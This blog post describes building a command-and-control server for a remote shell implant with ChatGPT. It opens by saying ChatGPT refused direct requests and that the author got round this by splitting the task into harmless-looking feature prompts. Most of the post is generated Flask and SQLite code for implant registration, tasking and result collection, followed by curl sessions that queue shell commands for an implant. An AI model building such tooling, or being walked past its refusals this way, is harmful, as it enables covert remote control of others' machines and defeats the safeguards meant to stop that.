ChatGPT-Assisted Implant Development, Part 1.
This is a rambling post series, as an introduction to some other, forthcoming posts on the same topic. It is mostly a braindump of sorts as I go through the design process and try to get GPT to do some element of my job for me.
So recently I have been playing around with ChatGPT a bit, trying to get it to emit some "useful" code for offensive purposes.
Obviously, if you tell it to write you a botnet or implant or whatever, it will trigger the safeguards and tell you to fuck off.
It has, in fact, told me to fuck off a number of times, before I learned how to really "guide" it to a good conclusion - slowly.
The whole idea of this project is that I should have to write/modify as little code as possible, getting GPT to create stuff for me without me thinking too hard about anything beyond design, largely as an experiment.
The output won't be "production ready" by any means, but should work "well enough" for some use in CTF.
Final, hand-fixed code will be available in a GitHub repo for the blog post, here: https://github.com/fullspectrumdev/LooneysMeteorologist
Next post will probably use a different repo so I can "freeze in time" how things were.
Doing some design/planning work.
Before we begin, let's set out some basic design goals. We need to be super explicit about these upfront. GPT is kind of a fucking idiot, so we need to tell it very precisely what to do.
- Implant should be able to run shell commands.
- Command and Control should be written in Flask. An administrative API, and an API for the implants to talk to.
- Implant should be quickly portable across languages.
- Operators should be able to address implants directly.
- The administrative API should be a simple JSON/REST API that lets me submit tasks to the implants, list tasks, list implants...
- For simplicity, the implant will also use JSON for tasking.
Traffic obfuscation, cryptography, stealth, file transfer, etc. are all surplus to requirements for this during the initial design stages. This is basically a hyper-minimal "stage 0" implant.
I also don't care about UI/UX at this time, the only things I care about are "I can use curl or postman to interact". We can build a UI at a later date. I probably will use that as another excuse to use ChatGPT because I hate writing user interfaces.
So the first order of business is to have the implant register itself. From this, we want a few pieces of information:
- A unique identifier for the machine it is running on.
- The current username - what user are we on the box?
- The output of the command "uname -a".
- A unique identifier for that specific implant, like a build-id hardcoded into it.
- When the implant first checked in.
- We also want to store when the implant last checked in.
The second order of business will be defining what interfaces the administrative user (operator) has.
We, as an admin, want to be able to do the following:
- List implants, and information about the implants.
- List all tasks, or tasks for a specific implant, and their status (done or not done).
- Query a specific task to retrieve its output.
- Submit tasks for a specific implant.
- Cancel a task (if it has not been executed already).
The implant needs to be able to do the following things.
- Register itself with the C&C on launch.
- Request tasks.
- Execute the task.
- Submit the output of a task.
Now, given an implant can be given multiple tasks in between check-ins, this means every time it tries to get a task, the C&C needs to find the earliest incomplete task to give it.
The C&C also needs to update its "last seen" time each time the implant asks for a job, or submits results.
So far, this all looks like a lot of Flask and SQL boilerplate code, to be honest. A task that ChatGPT probably will excel at.
For prototyping reasons, we will write our implant itself in Python, and later convert it to other languages.
Implant Registration.
Our "register" packet will look something like the following. For reasons of bad characters, we will probably base64 encode some fields, which gives us room for encrypting them later "or something".
```json
{
  "implant-machine-id": "70fcd324ef2938896a0e979c2344f01f",
  "implant-uname": "Linux debian 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux",
  "implant-build-id": "ccf7963d775f6e29d8e5818e878e5e65",
  "implant-user": "uid=1001(user) gid=1001(user) groups=1001(user),27(sudo)"
}
```
The first-seen and check-in timestamps are calculated on the C&C server side.
The `implant-machine-id` is something unique from the actual host the implant is running on. For simplicity, we are going to use the contents of the `/etc/machine-id` file on Linux.
The `implant-build-id` is something we hardcode into each "build" so we can track distribution of our payload. This will be a randomly generated 32-character hex string, so it looks like a hash.
The `implant-uname` and `implant-user` fields are the outputs of `uname -a` and `id` on the target machine for now, though we may reconsider this later.
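As an aside, generating that build ID at "build" time is a one-liner. A sketch, assuming we just want 32 hex characters in the same shape as a machine-id:

```python
import secrets

# 32 hex characters; unique per build, baked into the implant source.
implant_build_id = secrets.token_hex(16)
print(implant_build_id)  # e.g. ccf7963d775f6e29d8e5818e878e5e65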
Designing the database/interactions.
We effectively need two "database tables" in this thing.
The first table will be our `implants` table, which will probably look something like the following.
implant-machine-id, implant-build-id, implant-uname, implant-user, first-seen, last-seen
The second table will be our `tasks` table, which contains all the job data.
implant-machine-id, task-uuid, task-data, task-created-time, task-status, task-executed-time, task-result
When a job is submitted to the C&C server, the job request will reference the `implant-machine-id`, and contain `task-data`. Server-side, the C&C will insert it into the database, setting `task-status` to 0, `task-created-time` to whenever the task was created, etc. It will return a `task-uuid` to the operator.
Tasks can have a `task-status` of 0, 1, 2, or 3, meaning "submitted, not completed", "in progress", "complete", or "cancelled".
When an implant checks in to request a task, the C&C server will query the `tasks` table for all tasks matching its `implant-machine-id` and return the earliest task that has not yet been completed and has not been cancelled. It will also update the `last-seen` column in the `implants` table, and set the `task-status` to 1, meaning the task has been sent to the implant. It will also send the implant the `task-uuid`.
When the implant completes the job, it will submit the `task-result` and `task-uuid` to the C&C. The C&C will update the `task-status` to 2 (meaning complete), record the time, and also update the `last-seen` marker.
In this way, the database effectively is acting as a job queue. The administrative API allows us to do some things, and the "implant" API allows for registration, job retrieval, and result submission.
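Concretely, the heart of that queue is a single SELECT. Here is a sketch of what we are angling for, written against the schema above (I've swapped the hyphens in the column names for underscores, since hyphens are a pain in SQL - a substitution GPT will quietly make for us later anyway):

```python
import sqlite3

def next_task(implant_machine_id):
    # task_status: 0 = submitted, 1 = in progress, 2 = complete, 3 = cancelled.
    # Oldest pending task first, so the queue behaves FIFO per implant.
    conn = sqlite3.connect('my_database.db')
    c = conn.cursor()
    c.execute("""SELECT task_uuid, task_data FROM tasks
                 WHERE implant_machine_id = ? AND task_status = 0
                 ORDER BY task_created_time ASC LIMIT 1""",
              (implant_machine_id,))
    task = c.fetchone()
    conn.close()
    return task  # None if the queue is empty
```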
So far, we basically have been writing out our specification along with a sideways trip into the difficulties of cryptography - don't worry, we will get to the prompt crafting and code in a bit.
Database Selection, More Security Thoughts.
I wanted to use Postgres for this originally, but due to sqlite3's solid Python library, portability, and ease of use for a toy prototype, I decided it was the better option. That way, I can set it up without fucking about with installing Postgres, etc.
Contrary to some beliefs, sqlite3 absolutely can handle multiple "database clients" interacting with it simultaneously.
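(As an aside, if write contention ever did become a problem, the usual move is enabling WAL mode - one pragma, sketched below. We don't bother with it for this toy.)

```python
import sqlite3

# Write-Ahead Logging lets concurrent readers coexist with a writer far
# more gracefully than the default rollback journal. Optional here.
conn = sqlite3.connect('my_database.db')
conn.execute('PRAGMA journal_mode=WAL')
conn.close()
```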
I decided that I'd live with any SQL injection bugs introduced by GPT, that adds to the flavour, and again, it is a toy prototype. It also would amuse me greatly if GPT did introduce some absolute monster of an injection issue.
I figure version 1 will eschew the use of any cryptography, as well as the use of any protection mechanism against SQL injections.
Database Types.
The next step is to define our "database types", or rather, what "type" of data goes into each table/row. Doing this ahead of time will allow us to be extremely specific when it comes to prompting GPT, and if we did want to do some input sanitizing, it makes our jobs a lot easier.
- `implant-machine-id`: TEXT (length: 32, maybe VARCHAR?)
- `implant-build-id`: TEXT (length: 32, maybe VARCHAR?)
- `implant-uname`: TEXT (no length limit here)
- `implant-user`: TEXT (no length limit here)
- `first-seen`: Datetime (we can use type detection here)
- `last-seen`: Datetime (we can use type detection here)
- `task-uuid`: TEXT (some length limit here depending on our uuid format?)
- `task-data`: TEXT (no length limit here)
- `task-created-time`: Datetime (we can use type detection here)
- `task-status`: Integer
- `task-executed-time`: Datetime (we can use type detection here)
- `task-result`: TEXT (no length limit here).
With those defined, let's write our first prompt - getting it to make a utility script that generates a database file for us.
Making ChatGPT Generate a Sqlite3 Database.
This is going to be fun. It only took me two prompts to make this turn out absolutely perfect.
The first prompt I gave it is as follows:
Using Python, write me a script that will create a Sqlite3 database with two tables, named "implants" and "tasks".
The "implants" table should contain the following columns:
implant-machine-id, implant-build-id, implant-uname, implant-user, first-seen, last-seen.
The "tasks" table should contain the following columns:
implant-machine-id, task-uuid, task-data, task-created-time, task-status, task-executed-time, task-result
The types of these are as follows:
implant-machine-id: TEXT (fixed length: 32, maybe VARCHAR?)
implant-build-id: TEXT (fixed length: 32, maybe VARCHAR?)
implant-uname: TEXT (no length limit here)
implant-user: TEXT (no length limit here)
first-seen: python's datetime.datetime() (we can use type detection here)
last-seen: python's datetime.datetime() (we can use type detection here)
task-uuid: TEXT (some length limit here - how long is a UUID?)
task-data: TEXT (no length limit here)
task-created-time: python's datetime.datetime() (we can use type detection here)
task-status: Integer
task-executed-time: python's datetime.datetime() (we can use type detection here)
task-result: TEXT (no length limit here).
Its response was as follows:
Here's a Python script that will create a SQLite3 database with two tables named "implants" and "tasks" according to your specifications:
```python
import sqlite3
import uuid
import datetime
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Create the "implants" table
c.execute('''CREATE TABLE implants (
implant_machine_id TEXT(32),
implant_build_id TEXT(32),
implant_uname TEXT,
implant_user TEXT,
first_seen TIMESTAMP,
last_seen TIMESTAMP
)''')
# Create the "tasks" table
c.execute('''CREATE TABLE tasks (
implant_machine_id TEXT(32),
task_uuid TEXT(36),
task_data TEXT,
task_created_time TIMESTAMP,
task_status INTEGER,
task_executed_time TIMESTAMP,
task_result TEXT
)''')
# Commit the changes to the database
conn.commit()
# Close the cursor and the connection
c.close()
conn.close()
```
This script creates a SQLite3 database named "my_database.db" and creates two tables inside it: "implants" and "tasks". The "implants" table has six columns, each with a specified data type. The "tasks" table also has six columns, with the task_uuid column being a TEXT column with a length of 36, as UUIDs are 36 characters long. The script uses Python's datetime.datetime() to specify the data types of the "first_seen", "last_seen", "task_created_time", and "task_executed_time" columns. Finally, the script commits the changes to the database and closes the cursor and connection objects.
I gave it a followup prompt:
can the implant_machine_id column in "tasks" table reference the column of the same name and type in the "implants" table?
And here is its response:
Yes, you can create a foreign key reference in the "tasks" table that references the "implant_machine_id" column in the "implants" table. This would ensure referential integrity between the two tables, meaning that the "implant_machine_id" value in the "tasks" table must exist in the "implants" table.
Here's how you could modify the "tasks" table creation code to add a foreign key reference to the "implants" table:
```python
# Create the "tasks" table
c.execute('''CREATE TABLE tasks (
implant_machine_id TEXT(32) REFERENCES implants(implant_machine_id),
task_uuid TEXT(36),
task_data TEXT,
task_created_time TIMESTAMP,
task_status INTEGER,
task_executed_time TIMESTAMP,
task_result TEXT,
PRIMARY KEY (implant_machine_id, task_uuid)
)''')
```
The `REFERENCES` keyword is used to specify the foreign key reference to the "implants" table. In this case, we are referencing the "implant_machine_id" column in the "implants" table.
Note that I also added a composite primary key to the "tasks" table using the `PRIMARY KEY` keyword. This means that the combination of the "implant_machine_id" and "task_uuid" columns must be unique in the "tasks" table.
Which leaves us with this script, which we will creatively name "mkdb.py".
What is very interesting is that this script works absolutely fine with no further effort.
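If you want to sanity-check what it actually created, a few lines of Python will dump the schema straight back out of the file (a quick sketch, nothing more):

```python
import sqlite3

# Print the CREATE TABLE statement for every table in the database.
conn = sqlite3.connect('my_database.db')
for name, sql in conn.execute("SELECT name, sql FROM sqlite_master WHERE type='table'"):
    print(sql)
conn.close()
```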
Making ChatGPT Build The Admin API.
This is also going to be extremely fun. I figured the best way to do this was to simply prompt it for each "feature". So I had to define the endpoints I wanted. This was pretty easy, to be perfectly honest. I'll just paste the prompts and outputs below, along with some commentary.
I will note that GPT starts repeating itself a hell of a lot, giving me this boilerplate warning every time that the code it's emitting is bad and I should feel bad.
Guess what? I don't fucking care.
First prompt. We want to list implants.
Using the above defined database, I want to write a simple Flask program that allows me to make a simple HTTP GET request to an endpoint named "list_implants", which returns a list of all registered implants in the implants table as JSON.
And its reply...
Here's a simple Flask program that defines an endpoint named "list_implants" that returns all the registered implants in the implants table as JSON:
```python
from flask import Flask, jsonify
import sqlite3
app = Flask(__name__)
@app.route('/list_implants', methods=['GET'])
def list_implants():
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Execute a SELECT query to retrieve all the implants
c.execute('SELECT * FROM implants')
# Fetch all the results as a list of tuples
results = c.fetchall()
# Close the cursor and the connection
c.close()
conn.close()
# Convert the results to a list of dictionaries
implants = []
for row in results:
implants.append({
'implant_machine_id': row[0],
'implant_build_id': row[1],
'implant_uname': row[2],
'implant_user': row[3],
'first_seen': row[4],
'last_seen': row[5]
})
# Return the list of implants as JSON
return jsonify({'implants': implants})
```
This code defines a Flask endpoint named "list_implants" that maps to the "/list_implants" URL path and accepts only GET requests. When a GET request is made to this endpoint, the function retrieves all the registered implants from the "implants" table using a SELECT query, and converts the results to a list of dictionaries. Finally, the list of implants is returned as JSON.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
Second Prompt...
Can you now show me an example function that maps to an endpoint named "list_tasks", which can either list all tasks, omitting the "task_result" column, or list only tasks for a specific implant, referenced by its implant_machine_id, if specified in a GET parameter?
And its reply...
Sure, here's an example function that maps to an endpoint named "list_tasks" that can list all tasks or list tasks for a specific implant if a "machine_id" query parameter is provided in the GET request:
```python
from flask import Flask, jsonify, request
import sqlite3
app = Flask(__name__)
@app.route('/list_tasks', methods=['GET'])
def list_tasks():
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Check if the machine_id query parameter is provided
machine_id = request.args.get('machine_id')
if machine_id:
# Execute a SELECT query to retrieve tasks for a specific implant
c.execute('SELECT implant_machine_id, task_uuid, task_data, task_created_time, task_status, task_executed_time FROM tasks WHERE implant_machine_id=?', (machine_id,))
else:
# Execute a SELECT query to retrieve all tasks, but omitting the task_result column
c.execute('SELECT implant_machine_id, task_uuid, task_data, task_created_time, task_status, task_executed_time FROM tasks')
# Fetch all the results as a list of tuples
results = c.fetchall()
# Close the cursor and the connection
c.close()
conn.close()
# Convert the results to a list of dictionaries
tasks = []
for row in results:
tasks.append({
'implant_machine_id': row[0],
'task_uuid': row[1],
'task_data': row[2],
'task_created_time': row[3],
'task_status': row[4],
'task_executed_time': row[5]
})
# Return the list of tasks as JSON
return jsonify({'tasks': tasks})
```
This code defines a Flask endpoint named "list_tasks" that maps to the "/list_tasks" URL path and accepts only GET requests. When a GET request is made to this endpoint, the function retrieves tasks either for a specific implant if a "machine_id" query parameter is provided, or all tasks if the "machine_id" query parameter is not provided, using a SELECT query. The function omits the "task_result" column from the SELECT query, as requested. Finally, the list of tasks is returned as JSON.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
Third prompt...
Can you now show me a function that maps to an endpoint named "get_output", that when provided with a GET request containing a task_uuid, returns all of the information about that task? If the task_uuid does not exist, return a 404.
And its reply...
Sure, here's an example function that maps to an endpoint named "get_output" that retrieves information about a task with a specified task_uuid:
```python
from flask import Flask, jsonify, request, abort
import sqlite3
app = Flask(__name__)
@app.route('/get_output', methods=['GET'])
def get_output():
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Get the task_uuid from the query parameters
task_uuid = request.args.get('task_uuid')
# Execute a SELECT query to retrieve the task with the specified task_uuid
c.execute('SELECT * FROM tasks WHERE task_uuid=?', (task_uuid,))
task = c.fetchone()
# Close the cursor and the connection
c.close()
conn.close()
# If no task is found, return a 404 error
if task is None:
abort(404)
# Convert the task tuple to a dictionary
task_dict = {
'implant_machine_id': task[0],
'task_uuid': task[1],
'task_data': task[2],
'task_created_time': task[3],
'task_status': task[4],
'task_executed_time': task[5],
'task_result': task[6]
}
# Return the task information as JSON
return jsonify(task_dict)
```
This code defines a Flask endpoint named "get_output" that maps to the "/get_output" URL path and accepts only GET requests. When a GET request is made to this endpoint, the function retrieves the task with the specified task_uuid using a SELECT query. If no task is found, the function returns a 404 error. Otherwise, the function converts the task tuple to a dictionary and returns the task information as JSON.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
So far - all we have been doing is querying data. We also started adding in error handling (which we can paste back into prior functions; that isn't cheating).
Next is the actually hard part: submitting and cancelling tasks.
Submitting a task will be done using a POST request. Here is the prompt.
Can you now show me a function that maps to an endpoint named "submit_task", which accepts the POST variables "implant_machine_id" and "task_data", creates an entry in the tasks table with this data, sets the task_created_time to the current time/date using datetime.datetime(), leaves the task_executed_time empty, sets the task_status to 0, and generates a task_uuid? It should return a JSON object containing the task_uuid and the implant_machine_id.
And here is what it created...
Sure, here's an example function that maps to an endpoint named "submit_task" and creates a new task entry in the database:
```python
from flask import Flask, jsonify, request
import sqlite3
import uuid
from datetime import datetime
app = Flask(__name__)
@app.route('/submit_task', methods=['POST'])
def submit_task():
# Get the POST data
implant_machine_id = request.form['implant_machine_id']
task_data = request.form['task_data']
# Generate a new UUID for the task
task_uuid = str(uuid.uuid4())
# Get the current datetime
current_time = datetime.now()
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Execute an INSERT query to create a new task entry
c.execute('INSERT INTO tasks VALUES (?, ?, ?, ?, ?, ?, ?)', (implant_machine_id, task_uuid, task_data, current_time, 0, None, None))
# Commit the transaction
conn.commit()
# Close the cursor and the connection
c.close()
conn.close()
# Return the task information as JSON
return jsonify({'task_uuid': task_uuid, 'implant_machine_id': implant_machine_id})
```
This code defines a Flask endpoint named "submit_task" that maps to the "/submit_task" URL path and accepts only POST requests. When a POST request is made to this endpoint, the function retrieves the "implant_machine_id" and "task_data" POST variables, generates a new UUID for the task, gets the current datetime using datetime.now(), and executes an INSERT query to create a new task entry in the database. The function then returns a JSON object containing the task_uuid and the implant_machine_id.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
The "cancel task" logic is going to be a bit more complex. Here is what I came up with.
Can you now show me a function that maps to an endpoint named "cancel_task", which takes a GET parameter named "task_uuid". It should check if the task_uuid exists, and that its task_status is 0. If these conditions are met, it should set the task_status of this entry to 3, which indicates the task has been cancelled.
Now, here is what it created as output for me.
Sure, here's an example function that maps to an endpoint named "cancel_task" and cancels a task by updating its status in the database:
```python
from flask import Flask, jsonify, request
import sqlite3
app = Flask(__name__)
@app.route('/cancel_task', methods=['GET'])
def cancel_task():
# Get the task_uuid from the GET parameters
task_uuid = request.args.get('task_uuid')
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Execute a SELECT query to check if the task_uuid exists and its task_status is 0
c.execute('SELECT task_status FROM tasks WHERE task_uuid=?', (task_uuid,))
result = c.fetchone()
if result is None:
# If the task_uuid doesn't exist, return a 404
return jsonify({'error': 'Task not found'}), 404
elif result[0] != 0:
# If the task_status is not 0, return an error
return jsonify({'error': 'Task status is not 0, cannot cancel'}), 400
else:
# If the task_uuid exists and its task_status is 0, update its status to 3 to cancel it
c.execute('UPDATE tasks SET task_status=3 WHERE task_uuid=?', (task_uuid,))
conn.commit()
# Close the cursor and the connection
c.close()
conn.close()
# Return a success message
return jsonify({'message': 'Task cancelled successfully'})
```
This code defines a Flask endpoint named "cancel_task" that maps to the "/cancel_task" URL path and accepts only GET requests. When a GET request is made to this endpoint, the function retrieves the "task_uuid" GET parameter and executes a SELECT query to check if the task_uuid exists and its task_status is 0. If these conditions are met, the function executes an UPDATE query to set the task_status of the task entry to 3 to cancel it. If the task_uuid doesn't exist, the function returns a 404 error. If the task_status is not 0, the function returns a 400 error. If the task is successfully cancelled, the function returns a success message.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
So far, all of this looks relatively successful. However, we can't really wire it up or test it properly without the corresponding implant API, so that comes next!
Making ChatGPT Build The Implant API.
This is going to be even more fun!
First, we tackle the "register" endpoint. This is a simple enough one to do.
Can you now show me a function that maps to the endpoint named "register", which accepts the following HTTP POST parameters: implant_machine_id, implant_build_id, implant_uname, implant_user.
It should insert these values into the implants database table, setting the first_seen to the current datetime.datetime() timestamp, and also setting the same value for last_seen.
And the response...
Sure, here's an example function that maps to the "register" endpoint:
```python
from flask import Flask, request, jsonify
import sqlite3
import datetime
app = Flask(__name__)
@app.route('/register', methods=['POST'])
def register():
try:
# extract POST parameters
implant_machine_id = request.form['implant_machine_id']
implant_build_id = request.form['implant_build_id']
implant_uname = request.form['implant_uname']
implant_user = request.form['implant_user']
# connect to the database
conn = sqlite3.connect('mydatabase.db')
c = conn.cursor()
# insert values into the implants table
current_time = datetime.datetime.now()
c.execute("INSERT INTO implants (implant-machine-id, implant-build-id, implant-uname, implant-user, first-seen, last-seen) VALUES (?, ?, ?, ?, ?, ?)",
(implant_machine_id, implant_build_id, implant_uname, implant_user, current_time, current_time))
# commit the transaction and close the connection
conn.commit()
conn.close()
# return success message
response = {'message': 'Registration successful'}
return jsonify(response), 200
except Exception as e:
# if an error occurs, return error message
response = {'message': 'Error: ' + str(e)}
return jsonify(response), 400
```
This function accepts a POST request to the "register" endpoint, and extracts the necessary parameters from the request's form data. It then connects to the SQLite database, inserts the values into the "implants" table, with the "first_seen" and "last_seen" columns set to the current timestamp. Finally, it returns a JSON response with a success or error message.
Next we need to tackle the "get_task" one. This one actually is a bit of a bother, to be perfectly honest.
Can you now show me a function that maps to an endpoint named "get_task", which takes an "implant_machine_id" as its only POST parameter?
It should update the appropriate entry in the implants table, setting the last_seen time to the current timestamp.
It should check the tasks table for tasks that are assigned to that implant_machine_id, which have a task_status value of 0. It should select the task with the earliest timestamp, update its task_status to 1, and return a JSON response containing the task_uuid and the task_data.
If no task is available, return a 404.
And its (surprisingly good looking) response.
Sure, here's an example function that maps to an endpoint named "get_task":
```python
import json
from datetime import datetime
import sqlite3
from flask import Flask, request, jsonify
app = Flask(__name__)
DATABASE = 'database.db'
@app.route('/get_task', methods=['POST'])
def get_task():
implant_machine_id = request.form['implant_machine_id']
conn = sqlite3.connect(DATABASE)
cursor = conn.cursor()
# Update last seen time for the given implant
cursor.execute("UPDATE implants SET last_seen = ? WHERE implant_machine_id = ?",
(datetime.now(), implant_machine_id))
# Find the next task for this implant
cursor.execute("SELECT task_uuid, task_data FROM tasks WHERE implant_machine_id = ? AND task_status = 0 ORDER BY task_created_time ASC LIMIT 1",
(implant_machine_id,))
task = cursor.fetchone()
if task is None:
return jsonify({'error': 'No task available for this implant'}), 404
# Update the task status to 1
task_uuid, task_data = task
cursor.execute("UPDATE tasks SET task_status = 1 WHERE task_uuid = ?",
(task_uuid,))
conn.commit()
conn.close()
return jsonify({'task_uuid': task_uuid, 'task_data': json.loads(task_data)})
```
This function first retrieves the `implant_machine_id` from the POST request parameters, then updates the `last_seen` field for the corresponding implant in the `implants` table with the current timestamp.
It then selects the next task for the given implant from the `tasks` table, with a `task_status` of 0 and ordered by `task_created_time`. If no task is available, it returns a 404 error.
If a task is available, it updates its `task_status` to 1 and returns a JSON response containing the `task_uuid` and `task_data`.
Now for the final piece: returning the data.
Can you now show me a function that maps to an endpoint named "submit_result", which takes an "implant_machine_id", "task_result", and "task_uuid" as POST parameters?
It should update the implants table's "last_seen" marker with the current timestamp for that "implant_machine_id", as well as updating the appropriate row in the "tasks" table for the "task_uuid" with the "task_result" data, along with setting "task_status" to 2, and "task_executed_time" to the current timestamp.
And the result...
Sure, here's an example function that maps to an endpoint named "submit_result":
```python
import sqlite3
from flask import Flask, request, jsonify
import datetime
app = Flask(__name__)
@app.route('/submit_result', methods=['POST'])
def submit_result():
# get parameters from POST request
implant_machine_id = request.form['implant_machine_id']
task_result = request.form['task_result']
task_uuid = request.form['task_uuid']
# update implants table's "last_seen" marker
conn = sqlite3.connect('database.db')
cur = conn.cursor()
cur.execute('UPDATE implants SET last_seen=? WHERE implant_machine_id=?', (datetime.datetime.now(), implant_machine_id))
conn.commit()
# update tasks table's appropriate row with "task_result" data
cur.execute('UPDATE tasks SET task_result=?, task_status=?, task_executed_time=? WHERE task_uuid=?', (task_result, 2, datetime.datetime.now(), task_uuid))
conn.commit()
# return success message as JSON
response = {'message': 'Task result submitted successfully.'}
return jsonify(response)
```
This function first gets the parameters from the POST request, including the implant_machine_id, task_result, and task_uuid.
Next, it updates the implants table's "last_seen" marker for the specified "implant_machine_id".
Finally, it updates the appropriate row in the tasks table for the specified "task_uuid", setting the "task_result" data, as well as the "task_status" to 2, and the "task_executed_time" to the current timestamp.
It then returns a JSON response containing a success message.
Now we have to wire up these functions into our final Flask program, which means just sanity-checking the variables, ensuring the imports are all fine, and adding a main at the end. Not hard.
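For completeness, the "main" in question is just the standard Flask dev-server invocation - this bit is mine, with the host and port matching the curl tests below:

```python
if __name__ == '__main__':
    # Flask's dev server is plenty for a toy prototype on localhost.
    app.run(host='127.0.0.1', port=5000)
```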
When we got to testing, we found a few bugs (mostly due to variable names being fucked up by GPT, or import issues). Nothing that we couldn't fix with a full-on test of every endpoint, parameter, and state though.
Testing our work so far with "curl".
This was honestly quite time consuming, and did surface a few bugs - as mentioned, it was just inconsistent naming of imports, and a couple of variables that got messed up. I probably would have spotted those had I reviewed the code a bit better, but oh well, testing shook em loose.
First, we register ourselves an implant using the /register endpoint.
$ export MID="79ef32b5ea31cbff9bbd405c61a6440d"
$ export BID="81312ee0edbffd6eacabe62905325051"
$ export IMPUNAME="TGludXggZGViaWFuIDUuMTAuMC05LWFtZDY0ICMxIFNNUCBEZWJpYW4gNS4xMC43MC0xICgyMDIxLTA5LTMwKSB4ODZfNjQgR05VL0xpbnV4Cg=="
$ export IMPUSER="dWlkPTEwMDEodXNlcikgZ2lkPTEwMDEodXNlcikgZ3JvdXBzPTEwMDEodXNlciksMjcoc3VkbykK"
$ curl -s -d "implant_machine_id=$MID&implant_build_id=$BID&implant_uname=$IMPUNAME&implant_user=$IMPUSER" http://127.0.0.1:5000/register
{"message":"Registration successful"}
Now we check that it is registered.
$ curl -s http://127.0.0.1:5000/list_implants | jq
{
"implants": [
{
"first_seen": "2023-05-02 09:51:10.416314",
"implant_build_id": "81312ee0edbffd6eacabe62905325051",
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"implant_uname": "TGludXggZGViaWFuIDUuMTAuMC05LWFtZDY0ICMxIFNNUCBEZWJpYW4gNS4xMC43MC0xICgyMDIxLTA5LTMwKSB4ODZfNjQgR05VL0xpbnV4Cg==",
"implant_user": "dWlkPTEwMDEodXNlcikgZ2lkPTEwMDEodXNlcikgZ3JvdXBzPTEwMDEodXNlciksMjcoc3VkbykK",
"last_seen": "2023-05-02 09:51:10.416314"
}
]
}
Next, we check if we have any tasks from the admin side.
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": []
}
Time to create a task.
$ curl -s http://127.0.0.1:5000/submit_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_data=d2hvYW1pCg==' | jq
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
}
Check it is listed.
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
}
]
}
Create another task, and list tasks again.
$ curl -s http://127.0.0.1:5000/submit_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_data=bHMgLwo=' | jq
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
}
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
}
]
}
Now we test listing tasks by machine ID.
$ curl -s http://127.0.0.1:5000/list_tasks?machine_id=79ef32b5ea31cbff9bbd405c61a6440d | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
}
]
}
Now we try to cancel a task.
$ curl -s http://127.0.0.1:5000/cancel_task?task_uuid=4cf2a102-f160-4af0-b449-8c8434f78937 | jq
{
"message": "Task cancelled successfully"
}
Add another task.
$ curl -s http://127.0.0.1:5000/submit_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_data=bHMgLwo=' | jq
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_uuid": "be33a894-00e0-4003-9053-a12c2cca330b"
}
Get the implant to request a task.
$ curl -s http://127.0.0.1:5000/get_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d'
{"task_data":"bHMgLwo=","task_uuid":"be33a894-00e0-4003-9053-a12c2cca330b"}
Now we check to see what the state of our tasks is.
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
